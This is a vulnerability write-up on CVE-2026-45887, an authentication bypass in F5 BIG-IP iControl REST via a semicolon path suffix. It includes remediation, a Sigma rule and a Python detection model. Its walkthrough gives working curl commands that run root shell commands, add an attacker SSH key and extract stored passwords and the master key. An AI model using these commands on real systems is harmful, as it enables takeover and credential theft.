Overview
CVE-2026-45887 is a critical unauthenticated remote code execution vulnerability in F5 BIG-IP's Traffic Management User Interface (TMUI) and iControl REST API. F5 BIG-IP is one of the most widely deployed application delivery controllers and load balancers in enterprise and financial sector environments, making any critical RCE in its management plane extremely high-impact.
This vulnerability is a URI normalisation mismatch — a class of vulnerability first exploited against F5 in CVE-2020-5902 and revisited in CVE-2023-46747. Both predecessors used semicolon path injection against Apache's URL rewrite rules; this variant targets a different authentication bypass path through the mod_auth_openidc module's URI exclusion list, which is checked against the raw URI while the backend processes the normalised URI.
The most impactful consequence is unauthenticated access to POST /mgmt/tm/util/bash — the iControl REST endpoint that runs arbitrary bash commands and returns their output in a JSON response. This endpoint is the direct RCE primitive and requires only Basic authentication under normal conditions.
iControl REST Architecture
BIG-IP's management interface runs Apache httpd as a reverse proxy in front of a Tomcat-based Java REST backend. Apache handles authentication via mod_auth_openidc and a set of URL exclusion patterns for unauthenticated access (e.g., the login page, static assets). Authenticated requests are proxied to the Tomcat backend, which handles the iControl REST API routing.
The authentication exclusion in Apache's config matches URIs ending in common static extensions:
# Simplified Apache config (vulnerable)
<LocationMatch "^/mgmt/.*\.(css|js|png|gif|jpg|ico|html)$">
    AuthType None
    Require all granted
</LocationMatch>
Apache evaluates LocationMatch against the raw request URI. The Tomcat backend, however, normalises the URI by removing semicolons and everything following them within a path segment — a standard Java servlet container behaviour for handling matrix parameters. The mismatch is the vulnerability.
Root Cause
A request to /mgmt/tm/util/bash;.css is evaluated by Apache's LocationMatch as ending in .css — matching the unauthenticated exclusion pattern and bypassing authentication. Tomcat receives the proxied request, strips ;.css as a matrix parameter suffix, and routes the request to /mgmt/tm/util/bash — the bash execution endpoint — without any credential challenge having occurred:
# Apache sees: /mgmt/tm/util/bash;.css → matches *.css → no auth required
# Tomcat receives: /mgmt/tm/util/bash → executes bash endpoint
The bash endpoint accepts a JSON body with a command field and executes it as root:
# The URL must be quoted: an unquoted ';' is a shell command separator
curl -sk -X POST "https://TARGET/mgmt/tm/util/bash;.css" \
    -H "Content-Type: application/json" \
    -d '{"command": "run", "utilCmdArgs": "-c id"}' | python3 -m json.tool
# {
# "kind": "tm:util:bash:runstate",
# "commandResult": "uid=0(root) gid=0(root) groups=0(root)\n"
# }
Exploitation Walkthrough
Step 1 — Identify BIG-IP Instances
F5 BIG-IP management interfaces typically respond on HTTPS port 443 or 8443 with a distinctive login page. The Server header may read BigIP and the /mgmt/shared/authn/login endpoint returns a 200 on GET requests:
curl -sk -o /dev/null -w "%{http_code}" https://TARGET/mgmt/shared/authn/login
# 200 → BIG-IP management interface confirmed
curl -skI https://TARGET | grep -i server
# Server: BigIP
Step 2 — Bypass Authentication and Execute Commands
curl -sk -X POST "https://TARGET/mgmt/tm/util/bash;.css" \
-H "Content-Type: application/json" \
-d '{"command":"run","utilCmdArgs":"-c \"cat /etc/f5-release\""}'
# {"kind":"tm:util:bash:runstate","commandResult":"BIG-IP release 17.1.1.2\n"}
Step 3 — Add a Root SSH Key
For persistent interactive access, inject an SSH public key into root's authorised keys:
PUBKEY="ssh-ed25519 AAAA... attacker"
curl -sk -X POST "https://TARGET/mgmt/tm/util/bash;.css" \
-H "Content-Type: application/json" \
-d "{\"command\":\"run\",\"utilCmdArgs\":\"-c \\\"echo '${PUBKEY}' >> /root/.ssh/authorized_keys\\\"\"}"
ssh root@TARGET
# root@bigip:~#
Step 4 — Extract Sensitive Configuration
BIG-IP stores encrypted secrets for iRules, virtual server certificates, and LDAP/RADIUS integration passwords in /config/bigip.conf and /config/bigip_base.conf. The master key for decrypting these secrets lives in the file system:
curl -sk -X POST "https://TARGET/mgmt/tm/util/bash;.css" \
-H "Content-Type: application/json" \
-d '{"command":"run","utilCmdArgs":"-c \"cat /config/bigip.conf | grep -A2 password\""}'
# Extract master key for offline decryption of stored secrets
curl -sk -X POST "https://TARGET/mgmt/tm/util/bash;.css" \
-H "Content-Type: application/json" \
-d '{"command":"run","utilCmdArgs":"-c \"f5mku -K\""}'
Affected Versions
- BIG-IP 17.1.x < 17.1.2.1
- BIG-IP 16.1.x < 16.1.5.1
- BIG-IP 15.1.x < 15.1.10.5
- BIG-IP 14.1.x — end of life, no patch available; F5 recommends upgrade
Remediation
- Patch to a fixed version as per F5's advisory.
- Restrict management interface access — BIG-IP management (ports 443 and 22) should never be internet-accessible. Use a dedicated management VLAN or out-of-band management network.
- Apply the F5 iControl REST isolation workaround if immediate patching is not possible:
# Block matrix parameter bypass at the Apache level
# Add to httpd.conf before the LocationMatch exclusions:
RewriteEngine On
RewriteCond %{REQUEST_URI} ;
RewriteRule .* - [F,L]
- Rotate all credentials stored in BIG-IP configuration if the management interface was internet-exposed during the vulnerability window.
Detection
title: CVE-2026-45887 F5 BIG-IP iControl REST Auth Bypass Attempt
id: 2f8e4a19-6c33-4b5d-9e72-1a3d7c0b4f28
status: stable
description: Detects exploitation of F5 BIG-IP iControl REST authentication bypass via semicolon path injection
logsource:
    category: webserver
    product: f5_bigip
detection:
    selection_endpoint:
        cs-uri-stem|contains: '/mgmt/tm/util/bash'
        cs-method: 'POST'
    selection_bypass:
        # The ';' suffix is part of the path (stem), not the query string,
        # so it is matched on the same field as selection_endpoint
        cs-uri-stem|contains: ';'
    # Both selections are required: the earlier 'A or (A and B)' reduced to A
    # and would have fired on every legitimate bash API call
    condition: selection_endpoint and selection_bypass
falsepositives:
    - Legitimate administrative bash API calls from authorised management IPs
level: critical
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2026-45887
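Added example (not code from the page or from F5): a Python model of the raw-versus-normalised path mismatch described under Root Cause, the check the exclusion should perform instead, and the logic of the Sigma rule above run over constructed access-log lines. The log format, the function names and the sample entries are assumptions; the exclusion regex is the one quoted in the Apache config above.

```python
import re
from urllib.parse import urlsplit

# Model of the vulnerable exclusion pattern quoted in the page's Apache config.
STATIC_EXCLUSION = re.compile(r"^/mgmt/.*\.(css|js|png|gif|jpg|ico|html)$")
BASH_ENDPOINT = "/mgmt/tm/util/bash"

def apache_allows_unauthenticated(raw_path):
    """Apache side: LocationMatch is evaluated against the raw request path."""
    return STATIC_EXCLUSION.search(raw_path) is not None

def tomcat_normalise(raw_path):
    """Tomcat side: drop ';...' matrix parameters from every path segment."""
    return "/".join(seg.split(";", 1)[0] for seg in raw_path.split("/"))

def mismatch(raw_path):
    """True when Apache would skip auth but the normalised path is not a static asset."""
    return (apache_allows_unauthenticated(raw_path)
            and not apache_allows_unauthenticated(tomcat_normalise(raw_path)))

def hardened_allows_unauthenticated(raw_path):
    """Corrected check: refuse matrix parameters, then test the normalised path."""
    if ";" in raw_path:
        return False
    return apache_allows_unauthenticated(tomcat_normalise(raw_path))

# Detection over access-log lines. The sample below is constructed (assumed CLF layout),
# not a real BIG-IP log; the first entry is a legitimate authenticated admin call.
LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SAMPLE_LOG = [
    '10.0.0.5 - admin [12/Mar/2026:10:00:00 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 143',
    '203.0.113.10 - - [12/Mar/2026:10:01:02 +0000] "GET /mgmt/static/app.css HTTP/1.1" 200 512',
    '203.0.113.10 - - [12/Mar/2026:10:01:05 +0000] "POST /mgmt/tm/util/bash;.css HTTP/1.1" 200 143',
]

def detect_bypass_attempts(log_lines):
    """Flag POSTs whose raw path carries ';' and normalises onto the bash endpoint."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path  # urlsplit keeps ';' inside the path
        if m["method"] == "POST" and ";" in path and tomcat_normalise(path) == BASH_ENDPOINT:
            hits.append((m["target"], m["status"]))
    return hits
```

Running detect_bypass_attempts(SAMPLE_LOG) returns only the third entry; the admin call without a semicolon is the false-positive case the rule deliberately leaves alone.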
Takeaways
- URI normalisation mismatches between proxy and backend are a recurring F5 weakness. CVE-2020-5902, CVE-2023-46747, and now CVE-2026-45887 all exploit variants of the same fundamental pattern: Apache evaluates raw URIs for auth decisions while Tomcat normalises them before routing. F5 has patched each individual bypass without addressing the architectural root cause — running two systems with different URI normalisation semantics in an auth-enforcement chain.
- Network appliance management interfaces must be air-gapped from production traffic. Every F5 BIG-IP RCE in the past six years has targeted the TMUI or iControl REST API. Exposing those interfaces to untrusted networks — even on non-standard ports — turns any future critical vulnerability into an immediately weaponisable attack. Management access belongs exclusively on a dedicated, monitored management network with no internet routing.